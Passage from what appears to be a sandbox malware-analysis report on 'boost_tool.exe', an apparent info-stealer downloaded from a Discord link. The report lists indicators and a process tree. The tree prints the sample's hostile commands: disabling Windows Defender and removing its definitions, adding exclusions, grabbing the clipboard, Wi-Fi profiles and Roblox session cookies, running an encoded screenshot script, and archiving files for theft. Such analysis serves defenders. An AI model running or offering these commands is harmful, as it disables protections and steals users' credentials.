96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
3060	powershell.exe
3060	powershell.exe
5072	powershell.exe
5072	powershell.exe
3284	powershell.exe
3284	powershell.exe
5128	powershell.exe
5128	powershell.exe
3060	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
96	taskmgr.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
4452	MicrosoftEdgeCP.exe
4452	MicrosoftEdgeCP.exe
4452	MicrosoftEdgeCP.exe
4452	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2148	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2148	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2148	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2148	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	96	taskmgr.exe
Token: SeSystemProfilePrivilege	96	taskmgr.exe
Token: SeCreateGlobalPrivilege	96	taskmgr.exe
Token: SeIncreaseQuotaPrivilege	3196	WMIC.exe
Token: SeSecurityPrivilege	3196	WMIC.exe
Token: SeTakeOwnershipPrivilege	3196	WMIC.exe
Token: SeLoadDriverPrivilege	3196	WMIC.exe
Token: SeSystemProfilePrivilege	3196	WMIC.exe
Token: SeSystemtimePrivilege	3196	WMIC.exe
Token: SeProfSingleProcessPrivilege	3196	WMIC.exe
Token: SeIncBasePriorityPrivilege	3196	WMIC.exe
Token: SeCreatePagefilePrivilege	3196	WMIC.exe
Token: SeBackupPrivilege	3196	WMIC.exe
Token: SeRestorePrivilege	3196	WMIC.exe
Token: SeShutdownPrivilege	3196	WMIC.exe
Token: SeDebugPrivilege	3196	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3196	WMIC.exe
Token: SeRemoteShutdownPrivilege	3196	WMIC.exe
Token: SeUndockPrivilege	3196	WMIC.exe
Token: SeManageVolumePrivilege	3196	WMIC.exe
Token: 33	3196	WMIC.exe
Token: 34	3196	WMIC.exe
Token: 35	3196	WMIC.exe
Token: 36	3196	WMIC.exe
Token: SeDebugPrivilege	928	tasklist.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	5200	tasklist.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	3284	powershell.exe
Token: SeDebugPrivilege	5128	powershell.exe
Token: SeDebugPrivilege	5192	powershell.exe
Token: SeIncreaseQuotaPrivilege	3196	WMIC.exe
Token: SeSecurityPrivilege	3196	WMIC.exe
Token: SeTakeOwnershipPrivilege	3196	WMIC.exe
Token: SeLoadDriverPrivilege	3196	WMIC.exe
Token: SeSystemProfilePrivilege	3196	WMIC.exe
Token: SeSystemtimePrivilege	3196	WMIC.exe
Token: SeProfSingleProcessPrivilege	3196	WMIC.exe
Token: SeIncBasePriorityPrivilege	3196	WMIC.exe
Token: SeCreatePagefilePrivilege	3196	WMIC.exe
Token: SeBackupPrivilege	3196	WMIC.exe
Token: SeRestorePrivilege	3196	WMIC.exe
Token: SeShutdownPrivilege	3196	WMIC.exe
Token: SeDebugPrivilege	3196	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3196	WMIC.exe
Token: SeRemoteShutdownPrivilege	3196	WMIC.exe
Token: SeUndockPrivilege	3196	WMIC.exe
Token: SeManageVolumePrivilege	3196	WMIC.exe
Token: 33	3196	WMIC.exe
Token: 34	3196	WMIC.exe
Token: 35	3196	WMIC.exe
Token: 36	3196	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3284	powershell.exe
Token: SeSecurityPrivilege	3284	powershell.exe
Token: SeTakeOwnershipPrivilege	3284	powershell.exe
Token: SeLoadDriverPrivilege	3284	powershell.exe
Token: SeSystemProfilePrivilege	3284	powershell.exe
Token: SeSystemtimePrivilege	3284	powershell.exe
Token: SeProfSingleProcessPrivilege	3284	powershell.exe
Token: SeIncBasePriorityPrivilege	3284	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1248	MicrosoftEdge.exe
4452	MicrosoftEdgeCP.exe
2148	MicrosoftEdgeCP.exe
4452	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4452 wrote to memory of 3428	4452	MicrosoftEdgeCP.exe	78
PID 4452 wrote to memory of 3428	4452	MicrosoftEdgeCP.exe	78
PID 4452 wrote to memory of 3428	4452	MicrosoftEdgeCP.exe	78
PID 4452 wrote to memory of 4300	4452	MicrosoftEdgeCP.exe	79
PID 4452 wrote to memory of 4300	4452	MicrosoftEdgeCP.exe	79
PID 4452 wrote to memory of 4300	4452	MicrosoftEdgeCP.exe	79
PID 4800 wrote to memory of 2548	4800	boost_tool.exe	85
PID 4800 wrote to memory of 2548	4800	boost_tool.exe	85
PID 2548 wrote to memory of 3776	2548	boost_tool.exe	121
PID 2548 wrote to memory of 3776	2548	boost_tool.exe	121
PID 2548 wrote to memory of 1000	2548	boost_tool.exe	171
PID 2548 wrote to memory of 1000	2548	boost_tool.exe	171
PID 2548 wrote to memory of 4068	2548	boost_tool.exe	88
PID 2548 wrote to memory of 4068	2548	boost_tool.exe	88
PID 2548 wrote to memory of 4260	2548	boost_tool.exe	119
PID 2548 wrote to memory of 4260	2548	boost_tool.exe	119
PID 2548 wrote to memory of 2396	2548	boost_tool.exe	118
PID 2548 wrote to memory of 2396	2548	boost_tool.exe	118
PID 2548 wrote to memory of 3732	2548	boost_tool.exe	154
PID 2548 wrote to memory of 3732	2548	boost_tool.exe	154
PID 2548 wrote to memory of 4340	2548	boost_tool.exe	105
PID 2548 wrote to memory of 4340	2548	boost_tool.exe	105
PID 2548 wrote to memory of 4908	2548	boost_tool.exe	104
PID 2548 wrote to memory of 4908	2548	boost_tool.exe	104
PID 2548 wrote to memory of 3552	2548	boost_tool.exe	103
PID 2548 wrote to memory of 3552	2548	boost_tool.exe	103
PID 2548 wrote to memory of 1960	2548	boost_tool.exe	102
PID 2548 wrote to memory of 1960	2548	boost_tool.exe	102
PID 2548 wrote to memory of 5020	2548	boost_tool.exe	150
PID 2548 wrote to memory of 5020	2548	boost_tool.exe	150
PID 2548 wrote to memory of 3592	2548	boost_tool.exe	99
PID 2548 wrote to memory of 3592	2548	boost_tool.exe	99
PID 1000 wrote to memory of 3060	1000	powershell.exe	101
PID 1000 wrote to memory of 3060	1000	powershell.exe	101
PID 3592 wrote to memory of 3196	3592	cmd.exe	111
PID 3592 wrote to memory of 3196	3592	cmd.exe	111
PID 1960 wrote to memory of 3864	1960	cmd.exe	110
PID 1960 wrote to memory of 3864	1960	cmd.exe	110
PID 4068 wrote to memory of 3284	4068	cmd.exe	109
PID 4068 wrote to memory of 3284	4068	cmd.exe	109
PID 4260 wrote to memory of 5072	4260	cmd.exe	108
PID 4260 wrote to memory of 5072	4260	cmd.exe	108
PID 2396 wrote to memory of 928	2396	cmd.exe	106
PID 2396 wrote to memory of 928	2396	cmd.exe	106
PID 3776 wrote to memory of 5128	3776	cmd.exe	107
PID 3776 wrote to memory of 5128	3776	cmd.exe	107
PID 4340 wrote to memory of 5176	4340	cmd.exe	116
PID 4340 wrote to memory of 5176	4340	cmd.exe	116
PID 5020 wrote to memory of 5192	5020	cmd.exe	115
PID 5020 wrote to memory of 5192	5020	cmd.exe	115
PID 3552 wrote to memory of 5200	3552	cmd.exe	114
PID 3552 wrote to memory of 5200	3552	cmd.exe	114
PID 4908 wrote to memory of 5208	4908	cmd.exe	113
PID 4908 wrote to memory of 5208	4908	cmd.exe	113
PID 3732 wrote to memory of 5216	3732	getmac.exe	112
PID 3732 wrote to memory of 5216	3732	getmac.exe	112
PID 2548 wrote to memory of 5472	2548	boost_tool.exe	124
PID 2548 wrote to memory of 5472	2548	boost_tool.exe	124
PID 5472 wrote to memory of 5780	5472	cmd.exe	125
PID 5472 wrote to memory of 5780	5472	cmd.exe	125
PID 2548 wrote to memory of 5816	2548	boost_tool.exe	129
PID 2548 wrote to memory of 5816	2548	boost_tool.exe	129
PID 2548 wrote to memory of 5904	2548	boost_tool.exe	140
PID 2548 wrote to memory of 5904	2548	boost_tool.exe	140

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1576	attrib.exe
6016	attrib.exe
4020	attrib.exe
1632	attrib.exe

C:\Windows\system32\LaunchWinApp.exe
"C:\Windows\system32\LaunchWinApp.exe" "https://cdn.discordapp.com/attachments/1210062749372256297/1210066881046773760/boost_tool.exe?ex=65e9359a&is=65d6c09a&hm=75fd977972c2d80ba7a06406860211ff842788b65bd80bbe0d3a54921037797f&"
1⤵
PID:3336

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1248

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
- NTFS ADS
PID:2280

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4452

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2148

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3428

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4300

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1312

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:96

C:\Users\Admin\Downloads\boost_tool.exe
"C:\Users\Admin\Downloads\boost_tool.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4800
- C:\Users\Admin\Downloads\boost_tool.exe
  "C:\Users\Admin\Downloads\boost_tool.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎‌‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎‌‏ .scr'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:5020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3552
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4908
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:5208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4340
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:1000
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:5452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\boost_tool.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5472
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5904
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5816
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5292
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4528
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:6016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5384
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5444
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5904
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5520
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:3856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5832
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48002\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\fDmre.zip" *"
    3⤵
    PID:5784
  - - C:\Users\Admin\AppData\Local\Temp\_MEI48002\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI48002\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\fDmre.zip" *
      4⤵
      Executes dropped EXE
      PID:5948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
